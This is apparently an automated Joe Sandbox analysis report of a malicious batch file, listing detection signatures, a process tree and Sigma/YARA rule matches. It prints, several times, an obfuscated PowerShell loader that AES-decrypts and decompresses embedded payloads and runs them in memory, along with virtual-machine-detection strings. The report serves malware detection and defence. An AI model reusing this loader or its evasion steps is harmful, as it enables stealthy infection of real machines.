Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
product.bat

Overview

General Information

Sample name:product.bat
Analysis ID:1574670
MD5:f3454e2cb275019527e248cb08111111
SHA1:4180893cca4dce02e0bbeab52b5a099201db5ffb
SHA256:0999322e8a2a984b5400544b31a91ae8dd49b362a2517fe497a8e1455de07d8f
Tags:batuser-lontze7
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2268 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\product.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7276 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 7304 cmdline: findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7428 cmdline: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 7436 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • dllhost.exe (PID: 7680 cmdline: C:\Windows\System32\dllhost.exe /Processid:{372c9116-8a11-4207-941c-c83db9f8d8a2} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
          • dllhost.exe (PID: 1660 cmdline: C:\Windows\System32\dllhost.exe /Processid:{29a28251-c10b-42e7-8393-a6c218333ff2} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
            • svchost.exe (PID: 1752 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1760 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1804 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • svchost.exe (PID: 2524 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 912 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
        • svchost.exe (PID: 356 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 704 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 932 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1044 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1188 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1212 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1376 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1388 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1400 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1520 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1636 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1668 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • cmd.exe (PID: 7764 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\product.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7972 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • findstr.exe (PID: 7988 cmdline: findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 8156 cmdline: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 8164 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • schtasks.exe (PID: 1624 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 1504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 8164INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x58d1:$b2: ::FromBase64String(
  • 0x1ece07:$b2: ::FromBase64String(
  • 0xa2242e:$b2: ::FromBase64String(
  • 0xa2248c:$b2: ::FromBase64String(
  • 0xa92ba4:$b2: ::FromBase64String(
  • 0x9e314f:$s1: -join
  • 0x9e432d:$s1: -join
  • 0xa1c6a1:$s1: -join
  • 0xa13f5e:$s3: Reverse
  • 0xa1ec0f:$s3: Reverse
  • 0x9dee08:$s4: +=
  • 0x9dee27:$s4: +=
  • 0x9dee62:$s4: +=
  • 0x9dee7f:$s4: +=
  • 0x9deeba:$s4: +=
  • 0x9def26:$s4: +=
  • 0x9defb2:$s4: +=
  • 0x9df0c0:$s4: +=
  • 0x9e0d3a:$s4: +=
  • 0x9e0d5d:$s4: +=
  • 0x9e45dc:$s4: +=

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); , CommandLine: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 1624, ProcessName: schtasks.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); , CommandLine: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8164, TargetFilename: C:\Windows\$nya-onimai2\IhrFKM.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{372c9116-8a11-4207-941c-c83db9f8d8a2}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 7680, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 912, ProcessName: svchost.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\product.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2268, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 7436, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
Source: C:\Windows\$nya-onimai2\IhrFKM.exeJoe Sandbox ML: detected
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000020.00000000.1531285281.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.3343115348.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
